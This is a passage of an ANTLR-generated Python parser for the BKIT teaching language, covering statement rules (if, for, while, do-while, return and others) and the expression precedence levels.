localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 241\n self.match(BKITParser.IF)\n self.state = 242\n self.expr()\n self.state = 243\n self.match(BKITParser.THEN)\n self.state = 244\n self.stmt_list()\n self.state = 252\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 245\n self.match(BKITParser.ELSEIF)\n self.state = 246\n self.expr()\n self.state = 247\n self.match(BKITParser.THEN)\n self.state = 248\n self.stmt_list()\n self.state = 254\n 
self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 257\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 255\n self.match(BKITParser.ELSE)\n self.state = 256\n self.stmt_list()\n\n\n self.state = 259\n self.match(BKITParser.ENDIF)\n self.state = 260\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 36, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 262\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def init_for(self):\n return self.getTypedRuleContext(BKITParser.Init_forContext,0)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def con_for(self):\n return 
self.getTypedRuleContext(BKITParser.Con_forContext,0)\n\n\n def update_for(self):\n return self.getTypedRuleContext(BKITParser.Update_forContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 264\n self.match(BKITParser.FOR)\n self.state = 265\n self.match(BKITParser.LEFT_PAREN)\n self.state = 266\n self.init_for()\n self.state = 267\n self.match(BKITParser.COMMA)\n self.state = 268\n self.con_for()\n self.state = 269\n self.match(BKITParser.COMMA)\n self.state = 270\n self.update_for()\n self.state = 271\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 272\n self.match(BKITParser.DO)\n self.state = 273\n self.stmt_list()\n self.state = 274\n self.match(BKITParser.ENDFOR)\n self.state = 275\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return 
self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 277\n self.match(BKITParser.WHILE)\n self.state = 278\n self.expr()\n self.state = 279\n self.match(BKITParser.DO)\n self.state = 280\n self.stmt_list()\n self.state = 281\n self.match(BKITParser.ENDWHILE)\n self.state = 282\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 284\n self.match(BKITParser.DO)\n self.state = 285\n self.stmt_list()\n self.state = 286\n self.match(BKITParser.WHILE)\n self.state = 287\n self.expr()\n self.state = 288\n 
self.match(BKITParser.ENDDO)\n self.state = 289\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 291\n self.var_non_init()\n self.state = 292\n self.match(BKITParser.ASSIGN)\n\n self.state = 293\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 295\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n 
self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 297\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_call_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 299\n self.function_call()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return 
self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 301\n self.match(BKITParser.RETURN)\n self.state = 303\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 302\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Init_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_init_for\n\n\n\n\n def init_for(self):\n\n localctx = BKITParser.Init_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_init_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 305\n self.scalar_var()\n self.state = 306\n self.match(BKITParser.ASSIGN)\n self.state = 307\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, 
re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Con_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_con_for\n\n\n\n\n def con_for(self):\n\n localctx = BKITParser.Con_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_con_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 309\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Update_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_update_for\n\n\n\n\n def update_for(self):\n\n localctx = BKITParser.Update_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_update_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 311\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def EQUAL(self):\n return 
self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_expr)\n self._la = 0 # Token type\n try:\n self.state = 318\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 313\n self.expr1(0)\n self.state = 314\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 315\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n 
self.state = 317\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 62\n self.enterRecursionRule(localctx, 62, self.RULE_expr1, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 328\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,23,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 323\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 324\n _la = self._input.LA(1)\n if not(_la==BKITParser.AND or _la==BKITParser.OR):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 325\n 
self.expr2(0) \n self.state = 330\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,23,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 64\n self.enterRecursionRule(localctx, 64, self.RULE_expr2, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 332\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 339\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,24,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 334\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise 
FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 335\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 336\n self.expr3(0) \n self.state = 341\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,24,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 66\n self.enterRecursionRule(localctx, 66, self.RULE_expr3, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 343\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 350\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,25,self._ctx)\n while _alt!=2 and 
_alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 345\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 346\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.STAR_INT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.MOD))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 347\n self.expr4() \n self.state = 352\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,25,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_expr4)\n try:\n self.state = 356\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.NOT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 353\n self.match(BKITParser.NOT)\n self.state = 354\n 
self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 355\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_expr5)\n self._la = 0 # Token type\n try:\n self.state = 361\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 358\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.MINUS_FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 359\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 360\n self.expr6()\n pass\n else:\n raise 
NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_expr6)\n try:\n self.state = 367\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,28,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 363\n self.expr7()\n self.state = 364\n self.index_op()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 366\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_expr7)\n try:\n self.state = 371\n self._errHandler.sync(self)\n la_ = 
